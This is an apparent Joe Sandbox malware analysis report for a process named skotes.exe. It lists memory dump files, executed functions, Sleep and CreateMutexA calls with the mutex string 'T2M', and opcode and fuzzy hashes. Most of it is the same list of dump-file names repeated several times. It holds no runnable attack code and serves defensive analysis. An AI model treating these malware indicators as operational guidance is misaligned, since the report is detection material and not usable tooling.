Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"$`'
API String ID: 3903695350-1436819768
Opcode ID: d7c110d9a3d807f8e3461e988f94df22a25153ba822446f4996ff84bcee1a553
Instruction ID: ba76e885b870b5926cb2815894645fd954667d3c0babe5ef794a9993d78f4e0f
Opcode Fuzzy Hash: d7c110d9a3d807f8e3461e988f94df22a25153ba822446f4996ff84bcee1a553
Instruction Fuzzy Hash: E1316931600301DFEB20ABB9D945B5B77E8EF0A31EF14683AE095EE591DF30B884CA11

Analysis Process: skotes.exePID: 6200, Parent PID: 6096COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1956
Total number of Limit Nodes:	9

Executed Functions

Function 004A652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,004A652A,?,?,?,?,?,004A7661), ref: 004A6567

Memory Dump Source

Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 62f6f249ed1cb511b939d793a017c3f59acd80552471b41f7c4b910aeb151039
Instruction ID: f8164cef0383df18adea4a674cf6b34acd2fbf1e673b79fa05b0c7133ad49a52
Opcode Fuzzy Hash: 62f6f249ed1cb511b939d793a017c3f59acd80552471b41f7c4b910aeb151039
Instruction Fuzzy Hash: 01E08C34500148BFCE257B19D80DA4D7B2AEB36755F0A4809FC0846222CB2AEFA1CA84

Function 00479BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0047A963
CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981

Strings

T2M, xrefs: 0047A970

Memory Dump Source

Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2M
API String ID: 1464230837-1911109154
Opcode ID: 3e11c2ab9da7139a9805c6713e8008d8b5f2db3c3e3427d2822d3ce3c0d612be
Instruction ID: b3443bfe3afa7992c30f355333c6efc3eb42469c3b476dfd70941ad57f6b30d9
Opcode Fuzzy Hash: 3e11c2ab9da7139a9805c6713e8008d8b5f2db3c3e3427d2822d3ce3c0d612be
Instruction Fuzzy Hash: 50313B71B002008BEF18DB78DD8DB9DB762ABC6310F24C61AE018973D6C77D9990875A

Function 00479F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0047A963
CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981

Strings

T2M, xrefs: 0047A970

Memory Dump Source

Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2M
API String ID: 1464230837-1911109154
Opcode ID: 596027880233f1251d58c380e5a5c5fe0259656e4e9e005f59586606625d308a
Instruction ID: 77cd0a13d5bb12226cd98f4ca529f94e65a803064158259691953da9a560ec9c
Opcode Fuzzy Hash: 596027880233f1251d58c380e5a5c5fe0259656e4e9e005f59586606625d308a
Instruction Fuzzy Hash: E53129717001048BEB189B68DD88BEDB762EBC6314F248A1EE01CE73D1D77D8990875A

Function 0047A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0047A963
CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981

Strings

T2M, xrefs: 0047A970

Memory Dump Source

Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2M
API String ID: 1464230837-1911109154
Opcode ID: 2d75bbf28c1119bb163a0903d776527888fd2723877d7b499c28cb203fddb720
Instruction ID: d9ec711f0691e619294fc4ead0c3b9f7b3c5dd73728a3be8601e636e5dd267bb
Opcode Fuzzy Hash: 2d75bbf28c1119bb163a0903d776527888fd2723877d7b499c28cb203fddb720
Instruction Fuzzy Hash: 51312971B011409BEB18DB78DD89BADB762DBC6314F24CA1AE01C973D1C77E99A0871A

Function 0047A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0047A963
CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981

Strings

T2M, xrefs: 0047A970

Memory Dump Source

Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
